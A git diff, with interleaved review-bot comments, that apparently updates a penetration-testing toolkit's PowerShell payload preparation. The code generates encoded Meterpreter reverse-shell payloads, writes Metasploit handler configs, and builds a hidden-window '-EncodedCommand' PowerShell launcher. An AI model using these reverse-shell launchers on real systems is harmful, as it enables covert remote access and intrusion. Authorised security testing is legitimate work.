diff --git a/readme/CHANGELOG b/readme/CHANGELOG
index 71f4f0d81..abf02b894 100644
--- a/readme/CHANGELOG
+++ b/readme/CHANGELOG
@@ -1,3 +1,10 @@
+~~~~~~~~~~~~~~~~
+version 7.3.7
+~~~~~~~~~~~~~~~~
+
+* replaced powershell prep with the old one - it broke almost all powershell injection in SET
+* fixed an issue that would cause scanner to continue to scan even when port not discovered (function issue)
+
 ~~~~~~~~~~~~~~~~
 version 7.3.6
 ~~~~~~~~~~~~~~~~
diff --git a/src/core/fasttrack.py b/src/core/fasttrack.py
index aa19ce110..dab272004 100644
--- a/src/core/fasttrack.py
+++ b/src/core/fasttrack.py
@@ -113,8 +113,8 @@ try:
 for ip in range1:
 sqlport = get_sql_port(ip)
 if sqlport == None:
- sql_nmap_scan(ip)
- if sql_nmap_scan != "":
+ nmapscan = sql_nmap_scan(ip)
+ if nmapscan != "":
 sql_servers = sql_servers + \
 ip + ":" + "1433" + ","
diff --git a/src/core/payloadgen/create_payloads.py b/src/core/payloadgen/create_payloads.py
index 854c00654..74e5a7a63 100644
--- a/src/core/payloadgen/create_payloads.py
+++ b/src/core/payloadgen/create_payloads.py
@@ -10,7 +10,6 @@ import base64
 from src.core.setcore import *
 from src.core.menu.text import *
 from src.core.dictionaries import *
-from src.payloads.powershell.prep import prep_powershell_payload
 try:
 if len(check_options("IPADDR=")) > 2:
@@ -600,7 +599,10 @@ try:
 if setshell_counter == 0:
 if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
 if os.path.isfile("%s/web_clone/index.html" % (setdir)):
- prep_powershell_payload()
+ try:
+ core.module_reload(src.payloads.powershell.prep)
+ except:
+ import src.payloads.powershell.prep
 if os.path.isfile("%s/x86.powershell" % (setdir)):
 fileopen1 = open(
 "%s/x86.powershell" % (setdir), "r")
diff --git a/src/core/set.version b/src/core/set.version
index ee11304de..704726ec8 100644
--- a/src/core/set.version
+++ b/src/core/set.version
@@ -1 +1 @@
-7.3.6
+7.3.7
diff --git a/src/core/setcore.py b/src/core/setcore.py
index be1c0a750..4c04d9470 100644
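Review bot: In src/core/fasttrack.py the new `if nmapscan != "":` only stops the append when sql_nmap_scan() signals "nothing found" with an empty string; if it returns None or any other falsy value the host is still added to sql_servers, which is the symptom the changelog says this fixes. The function's return contract is not visible here, so `if nmapscan:` is the safer test, and it is worth noting that the entry is written with a hard-coded `"1433"` regardless of what the scan actually reported. The enclosing try block starts outside the hunk.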
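Review bot: In src/core/payloadgen/create_payloads.py the bare `except:` around `core.module_reload(src.payloads.powershell.prep)` catches every failure, and the fallback `import src.payloads.powershell.prep` is a no-op once the module is already in sys.modules, so an exception raised inside prep on a second run leaves a stale x86.powershell behind with no error shown. Only the first-run case, where the dotted name is not bound yet, should fall through to the import: `except (NameError, AttributeError):`. This file pulls setcore in via `from src.core.setcore import *` rather than `as core`, so unless `core` is bound further up the file, `core.module_reload` raises NameError on every call and the reload never happens — worth confirming. The same try/except/import pattern is added in src/fasttrack/mssql.py, src/fasttrack/psexec.py and src/powershell/powershell.py, and the latter two also leave the commented-out `#prep_powershell_payload()` call behind as dead code. The enclosing try block starts outside the hunk.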
--- a/src/core/setcore.py
+++ b/src/core/setcore.py
@@ -1762,7 +1762,7 @@ def get_sql_port(host):
 # Build the socket with a .1 second timeout
 s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- s.settimeout(.1)
+ s.settimeout(.3)
 # Attempt to query UDP:1434 and return MSSQL running port
 try:
diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py
index 311bd8cbb..b306a2262 100644
--- a/src/fasttrack/mssql.py
+++ b/src/fasttrack/mssql.py
@@ -8,7 +8,6 @@ import subprocess
 import time
 import src.core.setcore as core
 import impacket.tds as tds
-from src.payloads.powershell.prep import prep_powershell_payload
 #from src.core.payloadgen import create_payloads
@@ -173,7 +172,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
 if choice1 == "1":
 web_path = None
- prep_powershell_payload()
+
+ #prep_powershell_payload()
 # if we are using a SET interactive shell payload then we need to make
 # the path under web_clone versus ~./set
@@ -245,20 +245,20 @@ def deploy_hex2binary(ipaddr, port, username, password):
 filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
 filewrite.close()
- #try:
- # core.module_reload(src.payloads.powershell.prep)
- #except:
- # import src.payloads.powershell.prep
+ try:
+ core.module_reload(src.payloads.powershell.prep)
+ except:
+ import src.payloads.powershell.prep
 # launch powershell
- prep_powershell_payload()
+ #prep_powershell_payload()
 # create the directory if it does not exist
 if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
 os.makedirs(os.path.join(core.setdir + "reports/powershell"))
 #with open(os.path.join(core.setdir + "x86.powershell")) as x86:
- x86 = file(core.setdir + "x86.powershell").read()
+ x86 = file(core.setdir + "x86.powershell").read().rstrip()
 # x86 = x86.read()
 x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py
index ca864853d..b63c80112 100644
--- a/src/fasttrack/psexec.py
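Review bot: The comment two lines above the changed line in src/core/setcore.py still reads `# Build the socket with a .1 second timeout` while the value is now `.3`, so the first thing a reader sees is wrong. Either update it to `# Build the socket with a .3 second timeout` or, better, hoist the value into a named constant so the comment cannot drift again. get_sql_port's body continues outside the hunk.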
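Review bot: In the third src/fasttrack/mssql.py hunk the rewritten `x86 = file(core.setdir + "x86.powershell").read().rstrip()` still uses the Python 2-only `file()` builtin and never closes the handle, even though the commented `#with open(...)` line directly above shows the intended form. `with open(os.path.join(core.setdir, "x86.powershell")) as fh:` / `x86 = fh.read().rstrip()` works on both interpreters and releases the handle, and it would match the `with open(...)` already used in src/powershell/powershell.py. deploy_hex2binary continues outside the hunk on both sides.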
+++ b/src/fasttrack/psexec.py
@@ -8,7 +8,6 @@ import os
 import subprocess
 import src.core.setcore as core
-from src.payloads.powershell.prep import prep_powershell_payload
 # Py2/3 compatibility
 # Python3 renamed raw_input to input
@@ -75,7 +74,12 @@ try:
 core.update_options("POWERSHELL_SOLO=ON")
 core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
- prep_powershell_payload()
+ #prep_powershell_payload()
+
+ try:
+ core.module_reload(src.payloads.powershell.prep)
+ except:
+ import src.payloads.powershell.prep
 # create the directory if it does not exist
 if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
diff --git a/src/payloads/powershell/prep.py b/src/payloads/powershell/prep.py
index 856af29ca..1a3483680 100644
--- a/src/payloads/powershell/prep.py
+++ b/src/payloads/powershell/prep.py
@@ -1,201 +1,203 @@ #!/usr/bin/env python -# coding=utf-8 -import os +import sys +import subprocess import re +import os import time +from src.core.setcore import * -import src.core.setcore as core +# grab stage encoding flag +stage_encoding = check_config("STAGE_ENCODING=").lower() +if stage_encoding == "off": + stage_encoding = "false" +else: + stage_encoding = "true" -# Py2/3 compatibility -# Python3 renamed raw_input to input -try: - input = raw_input -except NameError: - pass +# check to see if we are just generating powershell code +powershell_solo = check_options("POWERSHELL_SOLO") -def prep_powershell_payload(): +# check if port is there +port = check_options("PORT=") - # grab stage encoding flag - stage_encoding = core.check_config("STAGE_ENCODING=").lower() - if stage_encoding == "off": - stage_encoding = "false" +# check if we are using auto_migrate +auto_migrate = check_config("AUTO_MIGRATE=") + +# check if we are using pyinjection +pyinjection = check_options("PYINJECTION=") +if pyinjection == "ON": + # check to ensure that the payload options were specified right + if os.path.isfile(setdir + "/payload_options.shellcode"): + pyinjection = "on" + print_status( + "Multi/Pyinjection was specified. 
Overriding config options.") else: - stage_encoding = "true" + pyinjection = "off" - # check to see if we are just generating powershell code - powershell_solo = core.check_options("POWERSHELL_SOLO") +# grab ipaddress +if check_options("IPADDR=") != 0: + ipaddr = check_options("IPADDR=") +else: + ipaddr = input("Enter the ipaddress for the reverse connection: ") + update_options("IPADDR=" + ipaddr) - # check if port is there - port = core.check_options("PORT=") +# check to see if we are using multi powershell injection +multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower() - # check if we are using auto_migrate - auto_migrate = core.check_config("AUTO_MIGRATE=") +# turn off multi injection if pyinjection is specified +if pyinjection == "on": + multi_injection = "off" - # check if we are using pyinjection - pyinjection = core.check_options("PYINJECTION=") - if pyinjection == "ON": - # check to ensure that the payload options were specified right - if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")): - pyinjection = "on" - core.print_status("Multi/Pyinjection was specified. 
Overriding config options.") - else: - pyinjection = "off" +# check what payloads we are using +powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=") - # grab ipaddress - if core.check_options("IPADDR=") != 0: - ipaddr = core.check_options("IPADDR=") - else: - ipaddr = input("Enter the ipaddress for the reverse connection: ") - core.update_options("IPADDR=" + ipaddr) +# if we specified a hostname then default to reverse https/http +if validate_ip(ipaddr) == False: + powershell_inject_x86 = "windows/meterpreter/reverse_http" - # check to see if we are using multi powershell injection - multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower() - - # turn off multi injection if pyinjection is specified - if pyinjection == "on": - multi_injection = "off" - - # check what payloads we are using - powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=") - - # if we specified a hostname then default to reverse https/http - if not core.validate_ip(ipaddr): - powershell_inject_x86 = "windows/meterpreter/reverse_http" - - # prompt what port to listen on for powershell then make an append to the current - # metasploit answer file - if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): - # if we have multi injection on, don't worry about these - if multi_injection != "on" and pyinjection == "off": - core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector") - port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) - if not port: +# prompt what port to listen on for powershell then make an append to the current +# metasploit answer file +if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + # if we have multi injection on, don't worry about these + if multi_injection != "on": + if pyinjection == "off": + print_status( + "POWERSHELL_INJECTION is set to ON with multi-pyinjector") + port = input(setprompt( + ["4"], "Enter the port 
for Metasploit to listen on for powershell [443]")) + if port == "": port = "443" - with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen: - data = fileopen.read() + fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r") + data = fileopen.read() match = re.search(port, data) if not match: - with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: - filewrite.write("\nuse exploit/multi/handler\n") - if auto_migrate == "ON": - filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") - filewrite.write("set PAYLOAD {0}\n" - "set LHOST {1}\n" - "set LPORT {2}\n" - "set EnableStageEncoding {3}\n" - "set ExitOnSession false\n" - "exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding)) + filewrite = open( + "%s/meta_config_multipyinjector" % (setdir), "a") + filewrite.write("\nuse exploit/multi/handler\n") + if auto_migrate == "ON": + filewrite.write( + "set AutoRunScript post/windows/manage/smart_migrate\n") + filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" % + (powershell_inject_x86, ipaddr, port, stage_encoding)) + filewrite.close() - # if we have multi injection on, don't worry about these - if multi_injection != "on" and pyinjection == "off": +# if we have multi injection on, don't worry about these +if multi_injection != "on": + if pyinjection == "off": # check to see if the meta config multi pyinjector is there - if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): - if core.check_options("PORT=") != 0: - port = core.check_options("PORT=") + if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + if check_options("PORT=") != 0: + port = check_options("PORT=") # if port.options isnt there then prompt else: - port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) - if not port: + port = 
input(setprompt( + ["4"], "Enter the port for Metasploit to listen on for powershell [443]")) + if port == "": port = "443" - core.update_options("PORT={0}".format(port)) + update_options("PORT=" + port) - # turn off multi_injection if we are riding solo from the powershell menu - if powershell_solo == "ON": - multi_injection = "off" - pyinjection = "on" +# turn off multi_injection if we are riding solo from the powershell menu +if powershell_solo == "ON": + multi_injection = "off" + pyinjection = "on" - # if we are using multi powershell injection - if multi_injection == "on" and pyinjection == "off": - core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...") +# if we are using multi powershell injection +if multi_injection == "on": + if pyinjection == "off": + print_status( + "Multi-Powershell-Injection is set to ON, this should be sweet...") - # define a base variable - x86 = "" +# define a base variable +x86 = "" - # specify a list we will use for later +# specify a list we will use for later +multi_injection_x86 = "" + +# here we do some funky loops so we don't need to rewrite the code below +if multi_injection == "on": + port = check_config("POWERSHELL_MULTI_PORTS=") + port = port.split(",") + +if multi_injection == "on": + # iterate through the ports, used for POWERSHELL_MULTI_PORTS + for ports in port: + # dont cycle through if theres a blank + if ports != "": + print_status( + "Generating x86-based powershell injection code for port: %s" % (ports)) + multi_injection_x86 = multi_injection_x86 + "," + \ + generate_powershell_alphanumeric_payload( + powershell_inject_x86, ipaddr, ports, x86) + + if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + port_check = check_ports( + "%s/meta_config_multipyinjector" % (setdir), ports) + if port_check == False: + filewrite = open( + "%s/meta_config_multipyinjector" % (setdir), "a") + filewrite.write("\nuse exploit/multi/handler\n") + if auto_migrate == "ON": + filewrite.write( 
+ "set AutoRunScript post/windows/manage/smart_migrate\n") + filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % ( + powershell_inject_x86, ipaddr, stage_encoding, ports)) + filewrite.close() + + # if we aren't using multi pyinjector + if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + # if meta config isn't created yet then create it + if not os.path.isfile("%s/meta_config" % (setdir)): + filewrite = open("%s/meta_config" % (setdir), "w") + filewrite.write("") + filewrite.close() + port_check = check_ports("%s/meta_config" % (setdir), ports) + if port_check == False: + filewrite = open("%s/meta_config" % (setdir), "a") + filewrite.write("\nuse exploit/multi/handler\n") + if auto_migrate == "ON": + filewrite.write( + "set AutoRunScript post/windows/manage/smart_migrate\n") + filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % ( + powershell_inject_x86, ipaddr, stage_encoding, ports)) + filewrite.close() + +# here we do everything if pyinjection or multi pyinjection was specified +if pyinjection == "on": multi_injection_x86 = "" - - # here we do some funky loops so we don't need to rewrite the code below - if multi_injection == "on": - port = core.check_config("POWERSHELL_MULTI_PORTS=") - port = port.split(",") - - if multi_injection == "on": - # iterate through the ports, used for POWERSHELL_MULTI_PORTS - for ports in port: - # dont cycle through if theres a blank - if ports: - core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports)) - multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86) - - if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): - port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports) - if 
not port_check: - with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: - filewrite.write("\nuse exploit/multi/handler\n") - if auto_migrate == "ON": - filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") - filewrite.write("set PAYLOAD {0}\n" - "set LHOST {1}\n" - "set EnableStageEncoding {2}\n" - "set LPORT {3}\n" - "set ExitOnSession false\n" - "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) - - # if we aren't using multi pyinjector - if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): - # if meta config isn't created yet then create it - if not os.path.isfile(): - with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite: - filewrite.write("") - port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports) - if not port_check: - with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite: - filewrite.write("\nuse exploit/multi/handler\n") - if auto_migrate == "ON": - filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") - filewrite.write("set PAYLOAD {0}\n" - "set LHOST {1}\n" - "set EnableStageEncoding {2}\n" - "set ExitOnSession false\n" - "set LPORT {3}\n" - "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) - - # here we do everything if pyinjection or multi pyinjection was specified - if pyinjection == "on": - injections = [] - # read in the file we need for parsing - with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen: - payloads = fileopen.read()[:-1].rstrip() # strips an extra , - payloads = payloads.split(",") + # read in the file we need for parsing + fileopen = open(setdir + "/payload_options.shellcode", "r") + payloads = fileopen.read()[:-1].rstrip() # strips an extra , + payloads = payloads.split(",") + # format: payloadport + for payload in payloads: # format: payloadport - for payload in payloads: - # format: payloadport - 
payload = payload.split(" ") - powershell_inject_x86 = payload[0] - port = payload[1] - core.print_status("Generating x86-based powershell injection code...") - injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)) - multi_injection_x86 = ",".join(injections) + payload = payload.split(" ") + powershell_inject_x86 = payload[0] + port = payload[1] + print_status("Generating x86-based powershell injection code...") + multi_injection_x86 = multi_injection_x86 + "," + \ + generate_powershell_alphanumeric_payload( + powershell_inject_x86, ipaddr, port, x86) - # if its turned to off - if multi_injection == "off" and pyinjection == "off": - core.print_status("Generating x86-based powershell injection code...") - x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86) +# if its turned to off +if multi_injection == "off": + if pyinjection == "off": + print_status("Generating x86-based powershell injection code...") + x86 = generate_powershell_alphanumeric_payload( + powershell_inject_x86, ipaddr, port, x86) - # if we are specifying multi powershell injection - if multi_injection == "on" or pyinjection == "on": - x86 = multi_injection_x86[1:] # remove comma at beginning +# if we are specifying multi powershell injection +if multi_injection == "on" or pyinjection == "on": + x86 = multi_injection_x86[1:] # remove comma at beginning - # check to see if we want to display the powershell command to the user - verbose = core.check_config("POWERSHELL_VERBOSE=") - if verbose.lower() == "on": - core.print_status("Printing the x86 based encoded code...") - time.sleep(3) - print(x86) +# check to see if we want to display the powershell command to the user +verbose = check_config("POWERSHELL_VERBOSE=") +if verbose.lower() == "on": + print_status("Printing the x86 based encoded code...") + time.sleep(3) + print(x86) - #with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite: - 
filewrite = open(core.setdir + "/x86.powershell", "w")
- filewrite.write(x86)
- filewrite.close()
- core.print_status("Finished generating powershell injection bypass.")
- core.print_status("Encoded to bypass execution restriction policy...")
+filewrite = open("%s/x86.powershell" % (setdir), "w")
+filewrite.write(x86)
+filewrite.close()
+print_status("Finished generating powershell injection bypass.")
+print_status("Encoded to bypass execution restriction policy...")
diff --git a/src/powershell/powershell.py b/src/powershell/powershell.py
index 058b3fb95..ccabb06be 100644
--- a/src/powershell/powershell.py
+++ b/src/powershell/powershell.py
@@ -12,7 +12,6 @@ import subprocess
 import src.core.setcore as core
 from src.core.menu import text
-from src.payloads.powershell.prep import prep_powershell_payload
 # Py2/3 compatibility
 # Python3 renamed raw_input to input
@@ -43,7 +42,12 @@ if powershell_menu_choice != "99":
 with open(core.setdir + "/payload_options.shellcode", "w") as filewrite:
 filewrite.write("windows/meterpreter/reverse_tcp {},".format(port))
- prep_powershell_payload()
+ try:
+ core.module_reload(src.payloads.powershell.prep)
+ except:
+ import src.payloads.powershell.prep
+
+ #prep_powershell_payload()
 # create the directory if it does not exist
 if not os.path.isdir(core.setdir + "/reports/powershell"):
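Review bot: The new module-level src/payloads/powershell/prep.py calls `input(...)` for the address and port prompts but drops the `input = raw_input` compatibility shim that the removed version had and that src/fasttrack/psexec.py in this same commit still carries; on Python 2 `input()` evaluates what is typed, so a bare `443` comes back as an int and `port == ""` and `update_options("PORT=" + port)` misbehave. Restore the removed four-line shim right after the imports. The `fileopen = open(...)` handles for meta_config_multipyinjector and payload_options.shellcode are read but never closed, where the removed code used `with`. Since every prompt and file write now runs at import/reload time — which is what the callers' `module_reload` pattern depends on — a short header comment such as `# Module-level on purpose: callers re-run this file via core.module_reload()` would save the next maintainer from wrapping it back into a function.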